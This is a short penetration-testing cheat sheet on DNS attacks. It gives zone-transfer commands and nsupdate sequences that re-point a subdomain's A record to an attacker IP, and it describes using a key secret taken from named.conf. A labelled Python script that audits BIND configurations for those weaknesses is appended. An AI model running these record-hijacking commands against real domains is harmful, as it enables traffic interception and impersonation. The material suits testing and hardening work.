DNS
Subdomain Enumeration
- Get all the info via
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
There is also subrake, a subdomain enumeration and validation tool for bug bounty hunters and pentesters.
Join a Domain
Join a Windows domain by setting the A record to the attacker's IP. This needs a cert and private key.
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
Found Secrets for Keys
Sometimes a secret such as a key can be found, for example in /etc/bind/named.conf. This secret can be used to join the domain.
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
send
Hint: Copy the lines exactly. Every space counts, as the input has to match the example.
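
From the defender's side, the conditions these notes rely on (zone transfers open to anyone, dynamic updates allowed by address instead of by key, a key secret sitting in named.conf) can be checked in the BIND configuration itself. The following is an added example, not part of the original notes: the sample config, zone names and key names are constructed, and the simplified parser assumes no braces inside quoted strings and does not resolve `options {}` defaults, named ACLs or `update-policy`.

```python
import re

# Constructed sample config (not from the page): one weak zone, one hardened zone.
SAMPLE = '''
key "update-key" { algorithm hmac-sha256; secret "Q09OU1RSVUNURUQ//1BMQUNFSE9MREVS"; };
zone "weak.example" {
    type master;  // old setting: allow-update { any; };
    allow-transfer { any; };
    allow-update { 10.0.0.0/8; };
};
zone "hard.example" {
    type master;
    allow-transfer { key "xfer-key"; };
    allow-update { key "update-key"; };
};
'''

def strip_comments(text):
    """Drop /* */, // and # comments while leaving quoted strings untouched."""
    return re.sub(r'"[^"\n]*"|/\*.*?\*/|//[^\n]*|#[^\n]*',
                  lambda m: m.group(0) if m.group(0)[0] == '"' else '', text, flags=re.S)

def zone_blocks(text):
    """Yield (name, body) per zone; brace matching is needed because ACLs nest."""
    for m in re.finditer(r'\bzone\s+"([^"]+)"[^{;]*\{', text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth, i = depth + {'{': 1, '}': -1}.get(text[i], 0), i + 1
        yield m.group(1), text[m.end():i - 1]

def acl_entries(body, option):
    """Return the entries of an address-match list, or None if the option is unset."""
    m = re.search(r'\b' + re.escape(option) + r'\s*\{([^}]*)\}', body)
    return None if m is None else [e.strip() for e in m.group(1).split(';') if e.strip()]

def audit(conf_text):
    """Return findings as (subject, issue, detail) tuples."""
    text = strip_comments(conf_text)
    findings = [(k, 'inline-secret', 'move to an include file readable only by named')
                for k in re.findall(r'\bkey\s+"?([\w.-]+)"?\s*\{[^}]*\bsecret\b', text)]
    for name, body in zone_blocks(text):
        for opt in ('allow-transfer', 'allow-update'):
            entries = acl_entries(body, opt) or []  # unset: inherited, review separately
            weak = [e for e in entries if e != 'none' and not e.startswith('key ')]
            if weak:
                findings.append((name, opt, weak))
    return findings

if __name__ == '__main__':
    print(*audit(SAMPLE), sep='\n')
```

A zone with no finding here can still inherit a permissive setting from `options {}`, so review that block as well.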